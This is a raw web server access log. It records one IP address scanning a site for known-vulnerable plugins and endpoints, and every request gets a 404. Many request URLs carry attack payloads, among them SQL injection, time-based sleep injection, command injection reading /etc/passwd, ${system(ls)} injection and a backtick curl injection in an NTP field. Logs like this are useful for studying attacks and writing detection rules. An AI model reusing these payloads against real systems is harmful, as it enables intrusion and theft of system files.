137.220.197.141 - - [21/Jan/2024:18:37:38 +0100] "POST /index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:37:56 +0100] "POST /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:37:58 +0100] "POST /index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:38:21 +0100] "POST /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:38:23 +0100] "POST /index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:38:37 +0100] "GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:38:45 +0100] "GET /plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5(999999999),9%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:38:47 +0100] "GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:38:58 +0100] "GET /plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5(999999999),9%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:38:58 +0100] "GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:41:55 +0100] "GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:42:42 +0100] "GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:43:04 +0100] "GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:44:16 +0100] "POST /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:44:18 +0100] "POST /index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:45:52 +0100] "POST /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:45:54 +0100] "POST /index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:46:37 +0100] "POST /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:46:39 +0100] "POST /index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:46:49 +0100] "GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:48:51 +0100] "GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:48:54 +0100] "GET /?p=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:49:04 +0100] "GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:49:40 +0100] "GET /wp-content/uploads/wp-file-manager-pro/fm_backup/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:50:54 +0100] "GET /?p=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:51:04 +0100] "GET /wp-content/uploads/wp-file-manager-pro/fm_backup/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:51:09 +0100] "GET /?p=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:51:14 +0100] "GET /wp-content/uploads/wp-file-manager-pro/fm_backup/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:51:27 +0100] "GET /?p=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:51:27 +0100] "GET /wp-content/uploads/wp-file-manager-pro/fm_backup/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:54:08 +0100] "POST /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:54:10 +0100] "POST /index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:54:25 +0100] "GET /wp-content/uploads/wp-file-manager-pro/fm_backup/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:55:14 +0100] "GET /wp-content/uploads/wp-file-manager-pro/fm_backup/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:55:35 +0100] "GET /wp-content/uploads/wp-file-manager-pro/fm_backup/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:55:43 +0100] "GET /?p=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:56:53 +0100] "GET /?p=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:57:26 +0100] "GET /?p=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:58:08 +0100] "POST /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:58:10 +0100] "POST /index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:58:33 +0100] "POST /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:58:35 +0100] "POST /index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:59:19 +0100] "GET /wp-content/uploads/wp-file-manager-pro/fm_backup/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:59:39 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:59:41 +0100] "POST /checkValid HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:59:43 +0100] "GET /public/css/2bECzJuq9phud2gZOB49dOmzbjJ.css HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:01:18 +0100] "GET /wp-content/uploads/wp-file-manager-pro/fm_backup/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:01:31 +0100] "GET /wp-content/uploads/wp-file-manager-pro/fm_backup/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:01:52 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:01:54 +0100] "GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:02:03 +0100] "POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:02:50 +0100] "GET /?p=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:03:29 +0100] "POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:03:39 +0100] "POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:03:52 +0100] "POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:04:10 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:04:12 +0100] "POST /checkValid HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:04:14 +0100] "GET /public/css/2bECzJuq9phud2gZOB49dOmzbjJ.css HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:04:41 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:04:43 +0100] "POST /checkValid HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:04:45 +0100] "GET /public/css/2bECzJuq9phud2gZOB49dOmzbjJ.css HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:05:00 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:05:02 +0100] "GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:05:20 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:05:22 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:05:22 +0100] "POST /checkValid HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:05:24 +0100] "GET /public/css/2bECzJuq9phud2gZOB49dOmzbjJ.css HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:05:24 +0100] "GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:05:46 +0100] "GET /?p=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:05:48 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:05:50 +0100] "GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:05:50 +0100] "GET /infusions/downloads/downloads.php?cat_id=${system(ls)} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:05:58 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:06:03 +0100] "GET /?p=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:06:51 +0100] "POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:07:22 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:07:26 +0100] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:07:30 +0100] "GET /infusions/downloads/downloads.php?cat_id=${system(ls)} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:07:32 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:07:38 +0100] "POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:07:42 +0100] "GET /infusions/downloads/downloads.php?cat_id=${system(ls)} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:07:45 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:07:55 +0100] "GET /infusions/downloads/downloads.php?cat_id=${system(ls)} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:08:01 +0100] "POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:08:56 +0100] "POST /var HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:09:05 +0100] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:09:17 +0100] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:09:30 +0100] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:10:35 +0100] "POST /var HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:10:42 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:10:47 +0100] "POST /var HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:11:00 +0100] "POST /var HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:11:29 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:11:33 +0100] "GET /infusions/downloads/downloads.php?cat_id=${system(ls)} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:11:43 +0100] "POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:11:49 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:12:19 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:12:21 +0100] "GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:12:24 +0100] "GET /infusions/downloads/downloads.php?cat_id=${system(ls)} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:12:48 +0100] "GET /infusions/downloads/downloads.php?cat_id=${system(ls)} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:13:08 +0100] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:13:10 +0100] "GET /console/login/LoginForm.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:13:40 +0100] "POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:13:52 +0100] "POST /carbon/generic/save_artifact_ajaxprocessor.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:14:01 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:14:03 +0100] "GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:14:05 +0100] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:14:29 +0100] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:14:29 +0100] "POST /cgi-bin/system_mgr.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:14:30 +0100] "POST /var HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:14:30 +0100] "POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:14:34 +0100] "GET /console/login/LoginForm.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:14:43 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:14:44 +0100] "GET /console/login/LoginForm.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:14:44 +0100] "POST /checkValid HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:14:47 +0100] "GET /public/css/2bECzJuq9phud2gZOB49dOmzbjJ.css HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:14:49 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:14:51 +0100] "GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:14:56 +0100] "GET /console/login/LoginForm.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:15:25 +0100] "POST /var HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:15:29 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:15:37 +0100] "GET /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:15:49 +0100] "POST /var HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:17:10 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:17:12 +0100] "GET /infusions/downloads/downloads.php?cat_id=${system(ls)} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:17:12 +0100] "POST /checkValid HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:17:14 +0100] "GET /public/css/2bECzJuq9phud2gZOB49dOmzbjJ.css HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:17:14 +0100] "GET /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:17:26 +0100] "GET /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:17:26 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:17:31 +0100] "POST /cgi-bin/system_mgr.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:17:33 +0100] "POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:17:40 +0100] "GET /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:17:40 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:17:50 +0100] "GET /console/login/LoginForm.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:17:53 +0100] "POST /cgi-bin/system_mgr.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:17:55 +0100] "POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:18:18 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:18:19 +0100] "POST /cgi-bin/system_mgr.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:18:19 +0100] "POST /checkValid HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:18:21 +0100] "POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:18:21 +0100] "GET /public/css/2bECzJuq9phud2gZOB49dOmzbjJ.css HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:18:34 +0100] "GET /console/login/LoginForm.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:18:49 +0100] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:18:54 +0100] "GET /console/login/LoginForm.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:19:25 +0100] "GET /infusions/downloads/downloads.php?cat_id=${system(ls)} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:19:39 +0100] "GET /infusions/downloads/downloads.php?cat_id=${system(ls)} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:20:06 +0100] "POST /var HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:21:01 +0100] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:21:04 +0100] "GET /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:21:16 +0100] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:21:55 +0100] "GET /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:22:12 +0100] "GET /api/config HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:22:13 +0100] "POST /var HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:22:19 +0100] "GET /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:22:27 +0100] "POST /var HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:22:29 +0100] "GET /console/login/LoginForm.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:22:45 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:22:47 +0100] "GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:23:32 +0100] "GET /api/config HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:23:41 +0100] "GET /api/config HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:23:54 +0100] "GET /api/config HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:24:24 +0100] "GET /console/login/LoginForm.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:24:37 +0100] "GET /console/login/LoginForm.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:24:42 +0100] "POST /cgi-bin/system_mgr.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:24:44 +0100] "POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:26:25 +0100] "POST /cgi-bin/system_mgr.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:26:27 +0100] "POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:26:36 +0100] "GET /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:26:49 +0100] "GET /api/config HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:26:57 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:26:59 +0100] "GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:27:00 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:27:13 +0100] "POST /cgi-bin/system_mgr.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:27:15 +0100] "POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:27:25 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:27:27 +0100] "GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:27:36 +0100] "GET /api/config HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:27:58 +0100] "GET /api/config HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:28:37 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:28:46 +0100] "GET /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:28:47 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:28:58 +0100] "GET /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:29:00 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:29:36 +0100] "GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:29:39 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:29:41 +0100] "POST /checkValid HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:29:43 +0100] "GET /public/css/2bECzJuq9phud2gZOB49dOmzbjJ.css HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:31:28 +0100] "GET /api/config HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:31:47 +0100] "GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:32:01 +0100] "GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:32:16 +0100] "GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:32:27 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:33:20 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:33:22 +0100] "GET /api/config HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:33:34 +0100] "GET /api/config HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:33:43 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:35:00 +0100] "POST /cgi-bin/system_mgr.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:35:02 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:35:02 +0100] "POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:35:34 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:35:36 +0100] "POST /checkValid HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:35:38 +0100] "GET /public/css/2bECzJuq9phud2gZOB49dOmzbjJ.css HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:36:14 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:36:16 +0100] "POST /checkValid HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:36:18 +0100] "GET /public/css/2bECzJuq9phud2gZOB49dOmzbjJ.css HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:36:18 +0100] "GET /wp-json/wp/v2/lesson/1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:36:39 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:36:50 +0100] "POST / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:19:37:03 +0100] "POST / HTTP/1.1" 404 952
